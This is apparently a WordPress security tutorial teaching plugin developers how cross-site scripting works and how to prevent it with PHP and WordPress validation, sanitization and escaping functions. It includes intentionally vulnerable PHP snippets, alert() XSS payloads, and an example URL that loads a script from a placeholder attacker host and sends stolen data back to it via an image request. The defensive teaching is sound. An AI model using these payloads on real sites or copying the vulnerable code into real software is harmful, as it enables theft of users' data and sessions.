How to Prevent Cross Site Scripting Attacks
The WordPress Security Learning Center
How to Prevent Cross Site Scripting Attacks

2.2: How to Prevent Cross Site Scripting Attacks

Advanced
Updated January 4, 2017

Cross Site Scripting vulnerabilities are the most common vulnerability found in WordPress plugins by a significant margin. In an analysis that we did of 1599 WordPress plugin vulnerabilities reported over a 14 month period, we found the following distribution:

XSSAs you can tell from the above graphic, if you are able to fully understand and eliminate just the XSS vulnerabilities in your PHP code, you will be writing 47% less vulnerabilities. So lets spend some time discussing XSS, what it is, how it is exploited and how to prevent XSS vulnerabilities.

What is an XSS vulnerability?

XSS vulnerabilities are incredibly easy to write. In fact, if you simply write PHP in a way that feels intuitive, you will almost certainly write an XSS vulnerability into your code. Thankfully XSS vulnerabilities are also very easy to recognize.

echo "The value you entered is: " . $_GET['val'];

That is a classic XSS vulnerability. If you include this code in a WordPress plugin, publish it and your plugin becomes popular, you can have no doubt that a security analyst will at some point contact you reporting this vulnerability. You will have to fix it and the analyst will publicly disclose it, leaving you slightly embarrassed, but with a more secure application.

So why is this an XSS vulnerability? The way the above code works is it grabs a value from the URL and writes it back to the browser, unvalidated and unfiltered. If your application is hosted at https://example.com/test.php a site visitor might visit the following URL:

https://example.com/test.php?val=123

They will then see: “The value you entered is: 123” output into their browser. Probably the way the application was designed to work.

If someone visits the following URL:

https://example.com/test.php?val=<script>alert(‘Proof this is an XSS’);</script>

They will see the following in the browser: “The value you entered is:” and they will also see an alert box pop up saying “Proof this is an XSS”.

Why is unfiltered output dangerous?

A demonstration showing an alert box doesn’t seem like much of a threat. If you don’t fully understand the impact of an XSS vulnerability and someone reports this issue to you with an alert() box as a demonstration of the vulnerability, you might be inclined to not take it seriously. How can proof that you can execute javascript be proof of a serious security problem?

When an analyst sends you an alert() box as proof of a security vulnerability, they are showing that they can execute arbitrary javascript code in the browser. What they are really demonstrating is that by sending that URL to someone else, they can get that other person to execute arbitrary javascript in a browser.

One version of an exploit might look something like this:

https://example.com/test.php?val=<script src=”http://badsite.com/badscript.js”></script>

The attacker will send that link to a victim. The steps are as follows:

  • The victim clicks the link and visits the site. Let’s assume they’re already signed into the website with administrator level access.
  • The link and the XSS vulnerability cause the script to load from an external website into the target web page.
  • The script will have full access to the browser DOM environment including any HTTP cookie not protected by the HttpOnly flag.
  • The script performs a malicious action as the signed-in user. It also steals data from the website accessible to the signed in user (e.g. private messages the user has received) and sends it to the attacker. The data can be sent in a variety of ways, but one way could be to load an image like this from an external website: http://badsite.com/badPretendImage.jpg?stolendata=secretDataValues. The badPretendImage.jpg is actually a script that serves up an image but also stores any data received.

That is the basic mechanism of exploitation for an XSS vulnerability: An attacker finds a way to get a victim to load their javascript using an XSS vulnerability in the website. They use that to steal data from browsers.

In the example above, we have loaded an external javascript file into the page. XSS vulnerabilities vary and for a particular vulnerability it might not be feasible to include <SCRIPT> tags that load an entire external script. If that does not work, what could work is to add javascript directly in the exploit that is executed and performs some malicious action.

What is the HttpOnly flag and why is it important?

Before Internet Explorer version 6SP1, cookies were accessible both to web servers when a browser made a request, and to javascript. In other words, a script running in the browser on a particular website could simply read all cookies that the website had set.

This provided much flexibility to developers but also allowed malicious scripts to read cookie values and send them anywhere on the Internet. If an attacker was able to exploit an XSS vulnerability, the first thing they would do would be to steal any cookies they could read. This would allow them to gain instant administrative level access to websites if the victim was signed into the target website as an administrator.

In 2002, Microsoft released a feature with Internet Explorer Service Pack 1 that provided an optional special flag that could be set when a cookie was set. The flag is called HttpOnly and it specified that any cookies that included the HttpOnly flag must not be readable by javascript and should only be sent to the web server that set the cookie via HTTP. Hence the name ‘HttpOnly’. The feature was quickly adopted by other browser vendors because the security benefits were clear. This flag provided a robust way to protect sensitive cookies from XSS attacks. Today all major browser vendors support the HttpOnly flag.

WordPress also uses the HttpOnly flag to protect cookies, which prevents an attacker exploiting an XSS vulnerability from stealing sensitive cookies.

Tip: Changing the password of a WordPress user invalidates their cookies immediately. This can be used to sign out a user in the case of a suspected breach.

What is a Reflected XSS Vulnerability?

What we’ve discussed above is a reflected XSS vulnerability. A reflected XSS attack is usually a link that contains malicious code. When someone clicks on that link, they are taken to a vulnerable website and that malicious code is ‘reflected’ back into their browser to perform some malicious action.

Reflected XSS attacks are much less dangerous than stored XSS vulnerabilities (see below) for several reasons:

Reflected XSS attacks rely on a victim taking some kind of action whereby they visit the target website and cause it to generate content that performs a malicious action in their browser. This makes reflected XSS attacks very difficult or sometimes impossible to automate. Each victim must be targeted individually with an email or some other content that contains a malicious link which they need to click in order to be targeted in the attack.

Stored (or Persistent) XSS Vulnerabilities


A stored XSS attack is much more dangerous for two reasons.

First, a stored XSS attack can be automated. A script can be created that visits thousands of websites, exploits a vulnerability on each site and drops a stored XSS payload.

Second, victims in a stored XSS attack don’t have to take any action other than visiting the affected website. Anyone that visits the affected page on the site will become a victim because the stored malicious code will load in their browser. The victims do not need to take an additional action, like clicking an emailed link, to be affected.

A stored XSS attack occurs when an attacker sends malicious data to a website that is stored in a database or some other storage mechanism. Then when other site visitors visit a page or a specific URL, they are served that data which executes and performs some kind of malicious action.

Lets look at an example:

Screen Shot 2015-10-28 at 11.07.46 PM

The above code is a very basic guest book application. It’s also a classic example of a stored XSS vulnerability. When you load this application you will see a form asking you to sign a guest book that looks like this:

Screen Shot 2015-10-28 at 11.09.53 PM

Once you sign the guest book a few times, you’ll see something like this:

Screen Shot 2015-10-28 at 11.10.47 PM

If you enter some javascript in the signature text box that executes an alert box, you’ll see this:

Screen Shot 2015-10-28 at 11.12.49 PM

What happened here is a guest entered some javascript in the “Sign it” field that looks like this:

<script>alert('XSS Expoit worked');</script>

The javascript was stored and is now served up to every visitor to the guestbook page. This is a stored XSS vulnerability which has a much wider impact than a reflected XSS vulnerability. It can be used to steal data from every visitor to the affected page, not just visitors who click a specially crafted link. For this reason, stored XSS vulnerabilities are much more serious than reflected XSS.

Fixing this vulnerability is easy by validating input and sanitizing and escaping output. Let’s apply that to this script. Review the changes below.

Screen Shot 2015-10-28 at 11.31.25 PM

As you can see in the above example we’re validating the data using a regular expression. We now only allow a small subset of characters in the guestbook. Even though we don’t allow HTML tags, we run the data through PHP’s filter_var() function with the FILTER_SANITIZE_STRING filter to sanitize the string which will strip out any tags that might slip through due to a bug in our code. FILTER_SANITIZE_STRING actually removes any tags it finds.

Then, when we output each record in the guestbook, we use filter_var with the FILTER_SANITIZE_FULL_SPECIAL_CHARS filter which does not strip out tags, but it escapes them if they are present. So in the example above we are validating and sanitizing on input and we are escaping on output. This provides plenty of protection against a stored XSS in the case of a guestbook.

A further note on the above code: You probably noticed a few other things we could make more secure. For example, we are storing our guestbook in a file which is in a web accessible folder. That means the raw data is readable by the public. This in itself is undesirable, and giving an attacker read access to a file that is not designed for public consumption may introduce further vulnerabilities. One way to solve this is to create a data file but give it a PHP extension. Then make the first line of the file contain the following:

<?php die("Nothing to see here!"); ?>

When you write to the file, make sure that first line stays intact. When you read the file, always discard the first line. Store the file with a .php extension e.g. data.php. Then if an attacker tries to access the file, the web server will treat it as executable PHP and immediately exit.

Functions to Validate your Data

Validation in programming is when you verify that the data your application has received falls within constraints that you define to ensure it does not contain anything unreasonable, unnecessary or malicious. Validation is not a replacement for sanitization or escaping, because as we will see (in the section discussing filter_var() below), malicious data can get past a some validation functions.

The constraints you will use vary, but they frequently are similar to the constraints used within a strictly typed language. For example, you might use some of the following checks:

  • Is data an integer. (0 to 9 digits only)
  • Is data a float with a decimal point allowed. (0 to 9 and . character)
  • Is data numbers and dashes e.g. a credit card date field.
  • Is data a string with numbers, letters, spaces and punctuation only.
  • Is data one of a limited number of options that can be selected e.g. ‘option1’, ‘option2’, ‘option3’

During validation if you reject data you will often return an error to the user describing the problem and asking them for correct data.

Below we have included functions that are frequently used by PHP developers to check if data received by an application is valid (to validate data). These are usually used in an if() statement to check if data is valid and if not, the application returns an error to the user.

Function What it Does Example
is_numeric() Tests if data matches 0 to 9 with optional sign and optional decimal point. is_numeric($input) will return true if $input == ‘-9.123’
preg_match() Test if data matches regular expression. preg_match(‘/^[a-z]{2,3}$/’, $input) returns true if $input is lowercase letters either 2 or 3 characters long. Note the ^ and $ in the regex.
filter_var() Test if data conforms to a built-in PHP filter. filter_var($input, FILTER_VALIDATE_EMAIL) tests if $input is a valid email address. Other useful filters are FILTER_VALIDATE_IP, FILTER_VALIDATE_URL, FILTER_VALIDATE_BOOLEAN. You can find more filters here.
in_array() Tests if data is one of a range of allowed values. in_array($input, array(‘Windows’, ‘Linux’, ‘OSX’, ‘Other’)) will return true if $input contains one of the allowed values. Great for <select> fields and radio buttons on web forms.

How to safely use regular expressions for validation

When using regular expressions with preg_match() to validate data, make sure that you match the entire string by using a caret ^ character at the start of your regular expression and a dollar sign $ at the end. These match the start and end of a string and will ensure that you aren’t just validating something in the middle of the input but are validating the whole string. Leaving these out creates a serious security problem because an attacker can include some valid data which will pass your test, but prepend or append anything malicious they want.

Using filter_var() for validation does not replace sanitization or escaping.

In general, the filter_var() function is used as follows to validate data as it arrives in your application:

if($test = filter_var('test@example.com', FILTER_VALIDATE_EMAIL)){
        echo "Received: $test\n";
}

If you replace the email above with ‘test@example.com<script>’ you will see that the check fails and the echo statement is not executed.

Consider the following example which demonstrates how malicious data can get past a validation step. This shows how validation is no substitute for sanitization and escaping on output.

if($test = filter_var('http://example.com/?"><script>alert("XSS")</script><a"', FILTER_VALIDATE_URL)){
        echo "Received: $test\n";
}

The example above will output the following:

Received: http://example.com/?"><script>alert("XSS")</script><a"

This creates an XSS vulnerability if this output is unsanitized and unescaped. Changing the code as follows will remove the XSS vulnerability:

if($test = filter_var('http://example.com/?"><script>alert("XSS")</script><a"', FILTER_VALIDATE_URL)){
        echo "Received: " . esc_url($test) . "\n";
}

The above code will output the following, which is safe:

Received: http://example.com/?scriptalert(XSS)/scripta

See below for more information on functions you can use for escaping and sanitization.

Functions to Escape and Sanitize your Data

When you’re ready to output data back to a visitor’s web browser, a file, a network or some other place that data leaves your application, you will need to ensure the data you are outputting is safe. PHP and WordPress provide a variety of functions that escape and/or sanitize your data. It’s important to note that these functions will change your data if needed to make it safe.

PHP Built-in Sanitization and Escaping Functions

The following functions are built into PHP and you can use them whether or not you are running your application inside the WordPress environment. You’ll notice we provide several filter_var() examples. This is the new standard in PHP sanitization and is included by default with PHP since PHP version 5.2. We recommend using filter_var() instead of older PHP functions.

Function Output Description
intval(‘123AA456’) 123 Sanitize integers. [docs]
filter_var(‘mark<script>@example.com’, FILTER_SANITIZE_EMAIL) markscript@example.com Sanitize emails. [docs]
filter_var(‘Testing <tags> & chars.’, FILTER_SANITIZE_SPECIAL_CHARS) Testing &#60;tags&#62; &#38; chars. Encode special chars. [docs]
filter_var(‘Strip <tag> & encode.’, FILTER_SANITIZE_STRING); Strip & encode. Remove tags. [docs]
filter_var(‘Strip <tag> & encode.’, FILTER_SANITIZE_STRING, FILTER_FLAG_ENCODE_LOW | FILTER_FLAG_ENCODE_HIGH | FILTER_FLAG_ENCODE_AMP) Strip &#38; encode. Remove tags with extra encoding flags. [docs]

WordPress API Sanitization Functions

WordPress includes a range of sanitization functions that are designed for specific use cases. We’ve included example usages below that give you an idea of how data is changed by these functions.

Function Output Description
absint(‘-123ABC’) 123 Sanitizes positive integers. [docs]
sanitize_email(“!#$%^&*()__+=-{}|\][:\”\’;<>?/.,test@example.com”) !#$%^&*__+=-{}|’?/.test@example.com Sanitize email addresses. [docs]
sanitize_file_name(‘.-_/path/to/file–name.txt’); pathtofile-name.txt Sanitize filenames. [docs]
sanitize_html_class(‘class!@#$%^&*()-name_here.’); class-name_here Sanitize CSS class names. [docs]
sanitize_key(‘KeY-Name!@#$%^&*()<>,.?/’); key-name Sanitize keys for associative arrays. [docs]
sanitize_mime_type(‘text/plain-blah!@#$%^&*()}{[]”:;><,.?/’); text/plain-blah*./ Sanitize mime types. [docs]
sanitize_option(‘thumbnail_size_h’, ‘123ABC-_’); 123 Sanitize WP option. Filtering type depends on option name. [docs]
sanitize_sql_orderby(‘colName’); colName Sanitize a column name used in SQL ‘order by’. Returns blank if invalid chars found. [docs]
sanitize_text_field(‘<tag>some text</tag>’) some text Checks for invalid UTF-8, Convert single < characters to entity, strip all tags, remove line breaks, tabs and extra white space, strip octets. [docs]
sanitize_title(‘<tag><?php //blah ?>Title here’); title-here Turns text into a slug-style title for use in a URL. [docs]
sanitize_user(‘<tag>123ABCdef _.-*@name!#$’, true); 123ABCdef _ .-@name Sanitize WP usernames. Second param enables strict sanitization. [docs]

WordPress API Escaping Functions

WordPress also includes escaping functions for general use. We have included the main functions below with example input and output to illustrate their use.

Function Output Comments
esc_html(‘<tag> & text’); &lt;tag&gt; &amp; text Escape HTML for safe browser output. [docs]
esc_url(‘http://example.com/
<script>alert(“TEST”);</script>’);
http://example.com/
scriptalert(TEST);/script
Escape URLs to make them safe for output as text or HTML attributes. [docs]
esc_js(‘alert(“1”);’); alert(&quot;1&quot;); Escapes Javascript to make it safe for inline HTML use e.g. in onclick handler. [docs]
esc_attr(‘attr-<>&\'”name’); attr-&lt;&gt;&amp;&#039;&quot;name Use to escape HTML attributes e.g. alt, title, value, etc. [docs]
esc_textarea(‘Text <tag> & text’); Text &lt;tag&gt; &amp; text Escape text for output in <textarea> element. [docs]

The wp_kses() function

The wp_kses() is a more complex sanitization function. It strips evil scripts. That is where the name comes from: “kses strips evil scripts”. When you use wp_kses() you will need to include an array of tags and the allowed attributes for each tag as the second parameter to kses. Here’s an example:

$allowed = array( 
   'a' => array( 'href' => array(), 'title' => array() ), 
   'br' => array(), 
   'em' => array(), 
   'strong' => array(), 
);

echo wp_kses($output, $allowed);

The above will allow the ‘A’ tag with ‘href’ and ‘title’ attributes. It will also allow the following tags with no attributes: br, em and strong. If attributes are included with those tags, they will be stripped out.

wp_kses() is very processor intensive because the code is complex. So in general we recommend you first try to use built in PHP functions because they are fastest, then the simpler WordPress sanitization and escaping functions, and then only use wp_kses() if you must. That will give you the best performance for your plugin or theme.

Conclusion

By following the basic guidelines on this page you can avoid the most common vulnerabilities that are introduced into code. In general, spending time on input validation and output sanitization and escaping will make your application safe.

When choosing functions for sanitization and escaping, choose the function that most closely matches your specific use case. If you are outputting data into an HTML attribute, use a sanitization or escaping function specific for HTML attributes. This will give you the best combination of application performance and security.

If you are able to avoid XSS vulnerabilities and secure your application output, you will avoid almost half of all vulnerabilities that might be introduced into your application.

Further Reading

Did you enjoy this post? Share it!

The WordPress Security Learning Center

From WordPress security fundamentals to expert developer resources, this learning center is meant for every skill level. Get serious about WordPress Security, start right here.